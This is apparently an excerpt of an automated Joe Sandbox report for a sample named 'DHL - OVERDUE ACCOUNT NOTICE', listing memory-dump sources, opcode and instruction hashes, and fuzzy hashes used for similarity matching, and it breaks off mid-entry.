                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0884775b738bb89746495381c8ed1b874c33b26ec343969d002b5527251464f9
                                                  • Instruction ID: 4150021fad2ec1eb6382cf5962b1ed4ec805d0cf606b60aff80a3e4ba0a2746d
                                                  • Opcode Fuzzy Hash: 0884775b738bb89746495381c8ed1b874c33b26ec343969d002b5527251464f9
                                                  • Instruction Fuzzy Hash: CBF03AB0D09249DFCB81CFA4C44169CBBF0EB49214F1082EAC859D3351E2798E02DF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 356d186ebbd2cd4fb32e9ef65a00a6a7a5dbd29c7afd4daf96f244952b2361e6
                                                  • Instruction ID: 4b5e8af8404d1374e69863d22e647596e78929c7f352b4405f1e37d2bcf47025
                                                  • Opcode Fuzzy Hash: 356d186ebbd2cd4fb32e9ef65a00a6a7a5dbd29c7afd4daf96f244952b2361e6
                                                  • Instruction Fuzzy Hash: C7F017B4D04209DFDB44DFA9D9046AEBBF5FB48300F1082AA9818E3340EB345A01DF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42e84ca289dcbcb63c5d58718031bec787e126fce975b78a0b0b4e50f82b2f36
                                                  • Instruction ID: 60fe677a9d6fc3fe901f9296454755f4cacebd35582234c59756faa385bdbf07
                                                  • Opcode Fuzzy Hash: 42e84ca289dcbcb63c5d58718031bec787e126fce975b78a0b0b4e50f82b2f36
                                                  • Instruction Fuzzy Hash: 03F03AB5D19248DFC740DFA8C88169DBBF0AF4A200F2481EAC868D3341D2359A16DF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 478e0bad9768733ffeeb5c5ee8c787f7aef79e48cad3cb7f6d9a9a54862d517e
                                                  • Instruction ID: 43c1db27281adb2c11c98715e120bf1d826d19db69072e245a1a3da5d47c82f3
                                                  • Opcode Fuzzy Hash: 478e0bad9768733ffeeb5c5ee8c787f7aef79e48cad3cb7f6d9a9a54862d517e
                                                  • Instruction Fuzzy Hash: B3F0E57360022DEB4F10DE5C8C015DD37A4EF09234F008622FFA4D2200D335E961AB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e7c04b3c1e046698bed4af90c95feb51c8714a05939707d2fc91ac7f50362457
                                                  • Instruction ID: eecde5801709a3d3dd49f3aba18ba8c0f363583f1b869933c9c9945480ebe871
                                                  • Opcode Fuzzy Hash: e7c04b3c1e046698bed4af90c95feb51c8714a05939707d2fc91ac7f50362457
                                                  • Instruction Fuzzy Hash: 94F0E5B0809345EFC701CBB0D450568BFF4EF46310F1281EEC84843242E7365E56DB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fc31170b18f1fc34bc3fff1b590d34a7a68b22f1e45fa1f4d3e069870dd209db
                                                  • Instruction ID: 8015a7210b0e78ff87250e0eb416311bd249c7941fccb92e861e71457a04d89a
                                                  • Opcode Fuzzy Hash: fc31170b18f1fc34bc3fff1b590d34a7a68b22f1e45fa1f4d3e069870dd209db
                                                  • Instruction Fuzzy Hash: 44E086723940109B9208665EA88487EB7CAEBCA674751857AF20DD7351CE619C065395
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4381c7247832bc2ba4da52a553dd881110f17a8e49a1c7a6ec2eecfd2df1fa6
                                                  • Instruction ID: a70442ec8fba756617de57f8f11ff4b05cc7a76e88a2663400efe33cf985cf45
                                                  • Opcode Fuzzy Hash: e4381c7247832bc2ba4da52a553dd881110f17a8e49a1c7a6ec2eecfd2df1fa6
                                                  • Instruction Fuzzy Hash: 9EE06DF240A249DFD742DFB084105AA7BF9DB06220F2147E2C040C3151EA7A0E19EB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d73b6cf8d077286e07229fc0e3403454b35ceafa589d9907b45aafba27fa616d
                                                  • Instruction ID: 9850b7724bae20f002d64af09c462242c1866ffb91bd502c05d7911639b323fc
                                                  • Opcode Fuzzy Hash: d73b6cf8d077286e07229fc0e3403454b35ceafa589d9907b45aafba27fa616d
                                                  • Instruction Fuzzy Hash: 16F05E3450921ADFD750CB6498498AD3B79EF4A331F1063A08C2A521D7C73819429A10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8abf531bf51e29ff977782cc651ba9ca0a235144d11cefbc9c1bea191489881d
                                                  • Instruction ID: 20bcc818b8b985c03ee76bc6e2ef21edf433df72fe84811f394721f74002473e
                                                  • Opcode Fuzzy Hash: 8abf531bf51e29ff977782cc651ba9ca0a235144d11cefbc9c1bea191489881d
                                                  • Instruction Fuzzy Hash: 75E0D8713843429FC3051768E81189D77E6EFC66B471681BAE144C7662CF294C16C751
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 966cfd599ff517b598fda72b17868a3a1fdb8aab1a79307cf7533977f2859118
                                                  • Instruction ID: bfab9afae53c1120095c0e19663ea52c0f33c95a52713744430dfcdf44510ced
                                                  • Opcode Fuzzy Hash: 966cfd599ff517b598fda72b17868a3a1fdb8aab1a79307cf7533977f2859118
                                                  • Instruction Fuzzy Hash: A8E022F2A09248EFC301DBA0880065E7BE9AB4A200F1186E2940483181FE794E10AB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2fe93fb9d66d65b28110e71f0cb3d7159ce1267e4a5173c80c050aebc85fa381
                                                  • Instruction ID: 960d61637e2bd71e9b6540b004742ed845d7643f7a1ee397a11305a8ff6f5b42
                                                  • Opcode Fuzzy Hash: 2fe93fb9d66d65b28110e71f0cb3d7159ce1267e4a5173c80c050aebc85fa381
                                                  • Instruction Fuzzy Hash: 72E06DF5A8613BDBDB94CB44CCD4AACB77AAB45208F105368D01AD7221DE30598B9B02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fffc367c535dc6d550aac73d7070b0452946d769274df7f0ab3895e153e132a3
                                                  • Instruction ID: fa8c899e6a333714e86f90f6bab5ab03a3edf52240bfce09a8610d56f74a8e52
                                                  • Opcode Fuzzy Hash: fffc367c535dc6d550aac73d7070b0452946d769274df7f0ab3895e153e132a3
                                                  • Instruction Fuzzy Hash: B6F0C9B5A04208FFDB04DF94D841AADBBB9EB49310F14C1A9EC1857350D636AA61DF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3cd6c7d4d326d2c7ea70b987f494eb0c2d7a1fd0d81d4f211bedbfd1cbe604b
                                                  • Instruction ID: 81a5fe085264d5115da18c8c33069b6d094a87d10ea367f7104e44792531b9c8
                                                  • Opcode Fuzzy Hash: d3cd6c7d4d326d2c7ea70b987f494eb0c2d7a1fd0d81d4f211bedbfd1cbe604b
                                                  • Instruction Fuzzy Hash: 00E0867114A2918FC746CA68D8544923F61AF0623432907DBEC648F2B3C226DA53CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bfc1fb94f155c8d424bc80c913f5dfc8536366edffd5d64d88a3c3c88a1677b9
                                                  • Instruction ID: 9a0623fa33bfcf11eb07140355a64bba856c8582df55cfac41819019215603d8
                                                  • Opcode Fuzzy Hash: bfc1fb94f155c8d424bc80c913f5dfc8536366edffd5d64d88a3c3c88a1677b9
                                                  • Instruction Fuzzy Hash: ADE092F1947226CBDB94CB44C8C4AAC737AEB45204F1057A8D00AE3222DA701E8A9B01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 783f6c4dffc9722f85e77b5939158871eb7a47684f332f50edde848f40cd566e
                                                  • Instruction ID: 90ddcc4acab974b4ae87fa6c69b571ce2adb5beb156ee8377e5cafe8736f1a70
                                                  • Opcode Fuzzy Hash: 783f6c4dffc9722f85e77b5939158871eb7a47684f332f50edde848f40cd566e
                                                  • Instruction Fuzzy Hash: C6E0E5B4E05208EFCB84DFA8D4456ACFBF4EB48300F10C2E9882893341E6769A42DF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d4e7218201ec96b954a13e4087eb15ccff167fbf739b73105384e18323fdb879
                                                  • Instruction ID: 62a7cf60888c98deaff3b9362f984da9c2a0f7681649a013a223abfbe5bbc891
                                                  • Opcode Fuzzy Hash: d4e7218201ec96b954a13e4087eb15ccff167fbf739b73105384e18323fdb879
                                                  • Instruction Fuzzy Hash: 4DE08CF2609218EBC700DFA0C40569EBBEDEB0A211F019AB6950593150EE754E10AB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 774bb47a54d30d04b576bc613d9e4cc3977c4592e15e47d07fd9008ae915afd3
                                                  • Instruction ID: 801c7b4747aaf50850931801a272af2a3b4ccfcb896c58d55c87925f29969541
                                                  • Opcode Fuzzy Hash: 774bb47a54d30d04b576bc613d9e4cc3977c4592e15e47d07fd9008ae915afd3
                                                  • Instruction Fuzzy Hash: FEE08CF2806108EBC741EFA48400AAE7BECDB0A200F0146A5840483150EAB24A14AB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c996ff8ef3ea4e75ed4d83f27d53bc3c120bcfe6db80755243f9fc7c4d48e3c2
                                                  • Instruction ID: 248544ac6d2ad4776f819f4f6cd6d29e0bad915123e5aa516e433928690fba77
                                                  • Opcode Fuzzy Hash: c996ff8ef3ea4e75ed4d83f27d53bc3c120bcfe6db80755243f9fc7c4d48e3c2
                                                  • Instruction Fuzzy Hash: F6D012B6B00114CFDB10DF54E805AEDB7B5DB4D362F01C1A7D50A97244CB3956128FA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a2466811779971379f91f0f750d28623f11491550e2c78068868c49155aaaf0a
                                                  • Instruction ID: 8f9a772b46ed1a77443188281f6e446c631c053f469ff75952124422b1a87984
                                                  • Opcode Fuzzy Hash: a2466811779971379f91f0f750d28623f11491550e2c78068868c49155aaaf0a
                                                  • Instruction Fuzzy Hash: 82D0A7B6006282CFD3169B60F84E3987FB4AF06315F2E0283D019C3152C37C9855DF22
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07825f2b69445247848993cdd03814120950c4c494a4b9367ac509549bffc6c2
                                                  • Instruction ID: 3322726f2f58bc6079f5bb876563442f5e89bfcd74a12fe3ca16fe8e0b667ee3
                                                  • Opcode Fuzzy Hash: 07825f2b69445247848993cdd03814120950c4c494a4b9367ac509549bffc6c2
                                                  • Instruction Fuzzy Hash: 9DC012B15002489BD300DFF5D40A71976E8D706221F410294940883140DABA9580C6F5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f76ee43705975bcc8489c0e51559780f1a86834d5a86634b781b2b96c38e5ee6
                                                  • Instruction ID: d94387568ba84ce8ce61588a77e152a1b647bca20134a150b115831106faa7e5
                                                  • Opcode Fuzzy Hash: f76ee43705975bcc8489c0e51559780f1a86834d5a86634b781b2b96c38e5ee6
                                                  • Instruction Fuzzy Hash: 34E017B4E0422A8FCB20DF28D841BADB7B2FB48300F0042A9D419A3746E7356E42DF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db5b3f08ce0cac0d922c5ca972cf0fc7b4d4a8c39fe824ea2b6a776f80916468
                                                  • Instruction ID: c843aa0f81626b0ff4f2c981105861320ed2559bc492b4a111483dab5ebff608
                                                  • Opcode Fuzzy Hash: db5b3f08ce0cac0d922c5ca972cf0fc7b4d4a8c39fe824ea2b6a776f80916468
                                                  • Instruction Fuzzy Hash: 5CE0E278905229CBEB50CF60CD48B9CB7B0FB08300F0092A5C80EA7381DA386984CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 576df311218d291ce4115b0b754d53982c433480e72e7507a279bd7437164b2c
                                                  • Instruction ID: 62b73fc783822c617f192bee64bd4fce67109ae638e1c6821b89e8507ef6ed95
                                                  • Opcode Fuzzy Hash: 576df311218d291ce4115b0b754d53982c433480e72e7507a279bd7437164b2c
                                                  • Instruction Fuzzy Hash: F0D09E74914198CBCF40DF90D4955AC7BF5BB09311F109555940FA6245CA392985CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 68c1d6417919ac2cbefff8799baf96276dfa6a676d89792814027f14c5e5d9ef
                                                  • Instruction ID: eaa55d39ceb33a4fd9f8e17c5bb73c12e33cb5ed3d883de9d3907c89f0a24505
                                                  • Opcode Fuzzy Hash: 68c1d6417919ac2cbefff8799baf96276dfa6a676d89792814027f14c5e5d9ef
                                                  • Instruction Fuzzy Hash: 63C08CB104220687E31867A5F40E3287BEC5704316F044250E40C410524BB86840DEA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cbc58bcaae12b330dae81fa115dce304f97b250ee61b4fa99d0d9ebd661f054c
                                                  • Instruction ID: a7df037501c35222c4ed8b4d4305804357956dcb465c788b5943b416689fa6a1
                                                  • Opcode Fuzzy Hash: cbc58bcaae12b330dae81fa115dce304f97b250ee61b4fa99d0d9ebd661f054c
                                                  • Instruction Fuzzy Hash: 92B012E61E4201F6B50C6E74888082FBAD1FBB6B00F44AC05730C01450CCB49424D62F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a395fa17e5ccc614d9133f09f2df3dfc1f53e91879dbc6656f804608b570d0fb
                                                  • Instruction ID: 3b7de6b061446d60b7f8c9282ec3a45da301db3083e440000166a89c328ecda9
                                                  • Opcode Fuzzy Hash: a395fa17e5ccc614d9133f09f2df3dfc1f53e91879dbc6656f804608b570d0fb
                                                  • Instruction Fuzzy Hash: D1B09230190209CFC2009B58E448E6137E8AB08A04F0100F0E1088B632D621F8008A91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: T+-q$[V~*$[V~*$]\`
                                                  • API String ID: 0-1849991408
                                                  • Opcode ID: 315946c1946b9ab78b3cd2366b4af6f53fd9fc4a4daaf71f38b265e99302c202
                                                  • Instruction ID: 0b35722ebe2d0ec9dd39e037426d360766eba9860efba7c98ff9acdeef394157
                                                  • Opcode Fuzzy Hash: 315946c1946b9ab78b3cd2366b4af6f53fd9fc4a4daaf71f38b265e99302c202
                                                  • Instruction Fuzzy Hash: A0B12BB1E152699BDB04CFA9D9809AFFBF2BF89300F64D61AD415BB214D37099028F64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: T+-q$[V~*$]\`
                                                  • API String ID: 0-3978741314
                                                  • Opcode ID: b42d079fca1a17201172ca8859e0fa02d145784f9487d3c09b689327eca90e73
                                                  • Instruction ID: 9d06e5775da0249fb205a58a803eae963d22565a4b0720f89be6f11acac3d42c
                                                  • Opcode Fuzzy Hash: b42d079fca1a17201172ca8859e0fa02d145784f9487d3c09b689327eca90e73
                                                  • Instruction Fuzzy Hash: A4B13CB1E152699FDB04CFA9D9808AFFBF2BF89300F64D666D415BB214D37099028F64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f70576600a807a14f3261c52c5ff945d5eab2a29292da83c63c9d6ae4777bd1c
                                                  • Instruction ID: 2150763284c2758d86548fa9f52d109f4adfdbca81df8131d324a40ecc934aa7
                                                  • Opcode Fuzzy Hash: f70576600a807a14f3261c52c5ff945d5eab2a29292da83c63c9d6ae4777bd1c
                                                  • Instruction Fuzzy Hash: 0A32F9B4B00115CFEB14DF69C594AADB7F6BF89710F2580A9E509AB3A1CB31ED41CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 46d69b1830d89a874b88bbcdcbef7ab9cefb5ce3f84d8afd7af3e6c2505b0fd7
                                                  • Instruction ID: 2a696e2eaca3c1ba424af5c22513504c029dc75a42045732897b351d1d9bb679
                                                  • Opcode Fuzzy Hash: 46d69b1830d89a874b88bbcdcbef7ab9cefb5ce3f84d8afd7af3e6c2505b0fd7
                                                  • Instruction Fuzzy Hash: 8712C875D0071ACFCB15DF68C880AD9F7B1BF49310F1586AAD958AB211EB70AAC5CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 763ad81f95ff7ce57cceb5c495f43ea90e65cafa53065d06aa675413cae050de
                                                  • Instruction ID: cb4c082c55eeeb9a0fb09a42bd13d93e0a334bcfc7d19d35ab48883db5cbe43e
                                                  • Opcode Fuzzy Hash: 763ad81f95ff7ce57cceb5c495f43ea90e65cafa53065d06aa675413cae050de
                                                  • Instruction Fuzzy Hash: 9F12B875D0061ACFCB15DF68C880AD9F7B1BF49310F1586AAD958AB211EB70AAC5CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 073EBB47
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 58755a74492422951f1187b7c9fa901a50366b77a3e3aa6654778750ac158fbc
                                                  • Instruction ID: eac4fbd3a6cd695ae29d5e6df696d652f42281f94b2b29ddfa434ff1fd788a8c
